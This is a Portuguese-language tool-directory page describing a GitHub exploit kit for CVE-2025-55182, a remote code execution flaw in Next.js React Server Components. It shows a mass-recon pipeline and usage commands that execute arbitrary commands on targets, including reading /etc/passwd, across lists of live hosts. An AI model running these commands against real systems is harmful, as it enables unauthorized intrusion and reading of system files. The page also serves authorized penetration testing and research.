Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182-Simple-Scanner — Scanner de RCE de alta fidelidade para CVE-2025-55182 que afeta Next.js RSC. Suporta varredura em massa, execução de comandos e pipelines automatizados de reconhecimento. Construído para pentesters, pesquisadores e caçadores de recompensas. | Kitploit
Ferramentas/GitHubGitHub/satriarizka/cve-2025-55182-simple-scanner
ReconhecimentoScanners de VulnerabilidadesGeração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e Educação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHub
satriarizka/cve-2025-55182-simple-scanner

CVE-2025-55182-Simple-Scanner

Scanner de RCE de alta fidelidade para CVE-2025-55182 que afeta Next.js RSC. Suporta varredura em massa, execução de comandos e pipelines automatizados de reconhecimento. Construído para pentesters, pesquisadores e caçadores de recompensas.

Ver Repositório
4há 9 mesesAinda não revisado
Compartilhar

CVE-2025-55182: Scanner de RCE em Componentes de Servidor React

Um kit de ferramentas abrangente para detectar e explorar CVE-2025-55182, uma vulnerabilidade crítica de execução remota de código em aplicações Next.js que usam Componentes de Servidor React.

Este repositório apresenta um scanner Bash unificado (modo único e em massa), implementações em Python/Go e um fluxo de trabalho de reconhecimento para bug bounty.

Scanner Menu Scanner Demo


📂 Estrutura do Repositório

  • scanner.sh — Script Bash all-in-one para varredura de alvo único e em massa
  • python/exploit.py — Implementação Python estável (melhor escape de JSON)
  • go/main.go — Implementação de alto desempenho (compilável)

🚀 Fluxo de Trabalho de Reconhecimento (Metodologia Bug Bounty)

Para caça em massa em domínios curinga, use este pipeline para filtrar alvos antes da varredura:

root@kitploit:~
# 1. Enumerate subdomains
subfinder -dL wildcards.txt -all -recursive > subs.txt

# 2. Filter for live hosts
httpx -l subs.txt -o live.txt

# 3. Pre-scan detection using Nuclei (optional)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt

🛠️ Uso do Scanner Bash (Recomendado)

O script scanner.sh suporta varreduras de alvo único e varredura em massa a partir de uma lista de arquivos.

🔧 Instalação

root@kitploit:~
chmod +x scanner.sh

1️⃣ Modo de Alvo Único

Melhor para verificar um alvo específico com saída detalhada.

root@kitploit:~
# Basic check (defaults to "id")
./scanner.sh -d example.com

# Execute custom command
./scanner.sh -d https://target.com -c "cat /etc/passwd"

2️⃣ Modo de Varredura em Massa

Escaneia eficientemente uma lista de URLs e salva hosts vulneráveis em um arquivo.

root@kitploit:~
# Scan a list of URLs
./scanner.sh -l live.txt -c "whoami"

# Custom output file
./scanner.sh -l live.txt -o my_bounty.txt

Opções


🐍 Versão Python

Use esta se encontrar problemas com o escape de caracteres especiais no Bash.

Requisitos

root@kitploit:~
pip install requests

Uso

root@kitploit:~
python3 python/exploit.py -u http://target.com -c "uname -a"

🐹 Versão Go

Alto desempenho, dependências mínimas.

Executar diretamente

root@kitploit:~
go run go/main.go -u http://target.com -c "id"

Compilar binário

root@kitploit:~
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com

⚠️ Aviso Legal

Esta ferramenta é apenas para fins educacionais e testes de segurança autorizados. O uso não autorizado é estritamente ilegal. O desenvolvedor não assume nenhuma responsabilidade por uso indevido ou danos causados por este programa.


🔗 Referências

  • Detalhes NVD CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-55182

  • Aviso de Segurança React (vulnerabilidade dos Componentes de Servidor React): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

  • Template Nuclei do ProjectDiscovery: https://cloud.projectdiscovery.io/library/CVE-2025-55182

Baixar ferramenta
BandeiraDescrição
-d, --domainURL de alvo único
-l, --listArquivo contendo lista de URLs
-c, --commandComando a executar (padrão: id)
-o, --outputArquivo de saída para hosts vulneráveis (padrão: vulnerable_hosts.txt)